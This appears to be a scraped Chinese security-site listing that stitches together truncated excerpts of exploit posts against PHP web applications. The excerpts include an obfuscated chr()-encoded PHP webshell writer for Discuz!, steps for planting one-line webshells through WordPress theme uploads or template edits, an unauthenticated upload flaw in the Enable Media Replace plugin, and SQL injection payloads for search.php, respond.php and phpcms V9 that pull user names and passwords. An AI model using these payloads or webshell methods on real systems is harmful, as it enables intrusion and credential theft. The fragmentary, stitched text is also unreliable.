http://81sec.com/read.php?65
四个版本的漏洞, Discuz! 6.0 、7.0、7.2和X1.5。 传X1.5出0day,最后神马也木见……后t00ls大牛淫们发出了方法和EXP,围观下。 ——————————————
后台可以提交构造代码绕过过滤,成功解析生成一句话木马. <?php $filen=chr(46).chr(46).chr(47).chr(110).chr(117).chr(108).chr(108).chr(46).chr(112).chr(104).chr(112); $filec=chr(60).chr(63).chr(112).chr(104).chr(112).chr(32)
1.本机建立目录“heimian”,把一句话1.php放进去。打包heimian目录为zip文件。WP后台的主题管理,上传主题,安装。 则你的后门路径为:wp-content\themes\heimian\1.php 2.能编辑模板就能拿到shell 首先edit 模板 接着找php的文件,接着备份下他的内容,然后替换成一句话木马,接着访问那个页面的地址 /wp-c
PRODUCT NAME: Enable Media Replace WordPress Plugin PRODUCT URL 1: http://wordpress.org/extend/plugins/enable-media-replace/ PRODUCT URL 2: http://mansjonasson.se/wordpres
附图. 1 2 他没有验证是否登陆 直接上传成功. 点下一步是返回上传的图片路径. 3 他在这里验证了是否登陆后台. 我这里没登陆 所以提示 返回登陆页面. 4 上传成功. 文件名没有被重新命名. 直接利用II6解析成功获得权限
================================================================= phpcms V9 BLind SQL Injection Vulnerability =================================================================
这个是search.php exp 变种 search.php? encode=YToxOntzOjQ6ImF0dHIiO2E6MTp7czoxMjU6IjEnKSBhbmQgMT0yIEdST1VQIEJZIGdvb2RzX2lkIHVuaW9uIGFsbCBzZWxlY3QgY29uY2F0KHVzZXJfbmFtZSwweDNhLHBhc3N3b3JkLCciXCcpIHVuaW9uI
漏洞验证: respond.php?code=tenpay&attach=voucher&sp_billno=fjhgx respond.php?code=cncard respond.php?code=chinabank EXP: respond.php?code=tenpay&attach=voucher&sp_billno=1 and(select
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-{In The Name Of Allah The Mercifull}-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- [~] Tybe: REMOTE SQL iNJECTioN [~] Vendor: www.phpcms.cn [+] Software:
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-{In The Name Of Allah The Mercifull}-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= [~] Tybe: REMOTE SQL iNJECTioN [~] Vendor: www.phpcms.cn [+] Software: P
Copyright © 2005-2025 51CTO.COM 版权所有 京ICP证060544号